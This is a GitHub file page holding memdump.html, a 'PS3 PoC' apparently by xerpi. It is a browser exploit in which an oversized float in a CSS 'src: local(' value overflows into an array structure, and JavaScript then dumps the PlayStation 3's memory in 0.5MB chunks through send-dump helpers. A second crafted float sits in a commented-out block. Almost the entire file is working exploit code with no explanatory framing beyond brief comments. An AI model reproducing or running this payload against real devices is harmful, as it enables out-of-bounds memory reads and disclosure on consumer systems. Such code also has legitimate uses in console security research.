-
Notifications
You must be signed in to change notification settings - Fork 0
/
memdump.html
110 lines (88 loc) · 2.96 KB
/
memdump.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
<html>
<h1 id=1 style="src: local(
-0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000086916948407409767516802141034245578305928338506000167136272903009391749587200424
);" />
<body>
<h2>PS3 PoC</h2><h3>by xerpi</h3></br>
<script src="include/jquery.js"></script>
<script src="include/utils.js"></script>
<script type="text/javascript">
/* this ^ large float number overflows into an array
that is like:
struct array {
void *base;
int size;
};
In order to set a custom base and size, use the h2f tool.
It'll "convert" the base and size and give you the float number.
*/
// global vars
var BASE_ADDR = 0x8000000;
var ele = document.getElementById('1');
var mem = ele.style.src;
mem = mem.substr(6); //local(
var memsize = mem.length*2;
var STEP = 0x00050000; // 0.5MB
var i = 0;
function main()
{
//find_str_step("ELF");
if (i < 0x00050000) {
send_dump_real_addr(i, STEP);
i += STEP;
} else {
logAdd("======== END OF DUMP ========");
logAdd("======== END OF DUMP ========");
logAdd("======== END OF DUMP ========");
logAdd("======== END OF DUMP ========");
logAdd("======== END OF DUMP ========");
logAdd("======== END OF DUMP ========");
logAdd("======== END OF DUMP ========");
logAdd("======== END OF DUMP ========");
}
/*var msg = "";
var start = "";
var end = "";
for (j = 0; j < 0x04000000; j+= 0x80000) {
start = j.toString(16).toUpperCase();
end = (j+0x80000).toString(16).toUpperCase();
msg = msg + " 0x" + start + "-0x" + end + ".bin";
}
dbg(msg);*/
//send_read(0x1985e4, 0x100);
/*var block = 0x3500;
for (var i = 0; i < len; i+= block) {
dump_bytes(i, block)
}*/
//send_dump(10, 0x100);
//send_dump(0, 0x100);
//send_read(0x6ab180, 0x1000);
//send_dump(0x50b78c, 0xA0000);
//send_disasm(0x50b78d+0x120, 500);
//logAdd(s.charCodeAt(n));
}
function btnClick()
{
try {
logAdd("======== Start ========");
main();
logAdd("======== End ========");
} catch(e) {
dbg(e);
}
}
// print environment info
writeEnvInfo();
/*
document.write(
"<h1 id=2 style=\"src: local(0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000149166814797656930317536036916555936412317292798868691882309311268890342299594479676190658843261809903653034673295432095120696840889311854451790224796789957659858969637731992149641303614889028974326961354630);\" />"
);*/
document.write("BASEADDR: 0x" + BASE_ADDR.toString(16).toUpperCase() + "<br/>");
document.write("MEM SIZE: 0x" + memsize.toString(16).toUpperCase() +
" bytes (" + (memsize/1024)/1024 + " MB)<br/><br/>");
</script>
<button style="width:100px;" onclick="btnClick();">Start</button>
<br/><br/>
<div id="log"></div><br>
</body>
</html>